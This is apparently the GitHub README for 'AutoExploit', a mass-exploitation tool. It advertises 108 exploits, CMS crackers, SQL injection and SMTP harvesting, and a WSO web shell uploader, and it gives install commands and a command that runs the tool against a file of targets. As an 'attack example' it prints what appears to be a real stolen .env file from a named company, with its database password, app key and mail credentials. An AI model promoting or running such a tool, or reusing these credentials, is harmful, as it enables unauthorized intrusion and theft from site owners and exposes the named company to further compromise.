Skip to content

Latest commit

 

History

History
201 lines (146 loc) · 4.22 KB

README.md

File metadata and controls

201 lines (146 loc) · 4.22 KB

AutoExploit

A powerful tool for finding site vulnerabilities with 108 different exploits ☠️

info/opt

  • With this tool, you can use the designated exploits so that you can use those vulnerabilities 🔆
  • This tool also has crackers, such as WordPress, Joomla and... 🔆
  • This tool has WordPress, Joomla, etc. cms
  • It also has tools such as Sqli, cpanel, smtp and... 🔆
  • You can easily install this tool even in your Linux or Windows 🔆

Examples of exploits

  • ⚪ Wp_cloudflare
  • ⚪ phpunit
  • ⚪ env
  • ⚪ osCommerce
  • and .......

Examples of tools

  • 🟢 getSMTP
  • 🟢 wso Shell Uploader
  • 🟢 cms
  • and .......

Examples of cms

  • 🟡 Wordpress
  • 🟡 drupal
  • 🟡 joomla
  • 🟡 opencart

It has shells and special payloads for easier access and penetration into targets

Support from

🟢 Linux 🟢 Windows 🟡 Termux

Commands + implementation tips

  • Create a file in txt format and put the targets inside them
  • Then copy the targets file to the AutoExploit folder (or give the target file address to the tool

Then enter the following command 👇🏻

git clone https://github.com/esfelurm/AutoExploit
cd AutoExploit
python AutoExploit.py target.txt

Now it starts testing the exploits

If you don't understand, watch the videos below 👇🏻

educational video Part I

IMG_20231024_230504_176_001.mp4

educational video Part II

IMG_20231024_230504_176_002.mp4

Commands used in the video

  1. Install prerequisites
  2. Kali 👇🏻
    sudo apt update && sudo apt upgrade -y
    sudo apt install python3 python3-pip
    sudo apt install git
    pip3 install requests
    git clone https://github.com/esfelurm/AutoExploit
    

    Termux 👇🏻

    apt update && apt upgrade
    pkg install git
    pkg install python3
    pip install requests
    git clone https://github.com/esfelurm/AutoExploit
    
  3. Copy the targets file
  4. cp target.txt AutoExploit
    
  5. Enter the tools directory
  6. cd AutoExploit
    
  7. We run the tool
  8. python AutoExploit.py target.txt
    
  9. If the vulnerability is found and the work is completed, enter the result folder
  10. cd result
    
  11. Now open the files named config and you can see the results

Attack example :

  • Info :
APP_NAME="Westlink Group Of Companies"
APP_ENV=local
APP_KEY=base64:MKVU0RsaiKzXpRz+AmGyMu/4rOdNPPEvlyXmm3O+BLA=
APP_DEBUG=false
APP_URL=https://www.westlink.com.my/

LOG_CHANNEL=stack
LOG_LEVEL=debug

DB_CONNECTION=mysql
DB_HOST=110.4.45.32
DB_PORT=3306
DB_DATABASE=westlin1_sec_westlink_lat_v1
DB_USERNAME=westlin1_adm1
DB_PASSWORD=%?xwh%]KYFR-

BROADCAST_DRIVER=log
CACHE_DRIVER=file
QUEUE_CONNECTION=sync
SESSION_DRIVER=file
SESSION_LIFETIME=120

MEMCACHED_HOST=127.0.0.1

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_MAILER=smtp
MAIL_HOST=mail.westlink.com.my
MAIL_PORT=465
[email protected]
MAIL_PASSWORD=8dxtc+wgojx6
MAIL_ENCRYPTION=ssl

#MAIL_MAILER=smtp
#MAIL_HOST=smtp.mailtrap.io
#MAIL_PORT=2525
#MAIL_USERNAME=d5d5c2b307fe1f
#MAIL_PASSWORD=4912217d7c6151
#MAIL_ENCRYPTION=tls

MAIL_FROM_ADDRESS=null
MAIL_FROM_NAME="${APP_NAME}"

AWS_ACCESS_KEY_ID=
AWS_SECRET_ACCESS_KEY=
AWS_DEFAULT_REGION=us-east-1
AWS_BUCKET=

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"

BUSS_ADMIN="/admin_wlx"
BUSS_NAME="Westlink Engineering Sdn. Bhd"
BUSS_PHONE="+607-3539737"
BUSS_EMAIL="[email protected]"

Run successfully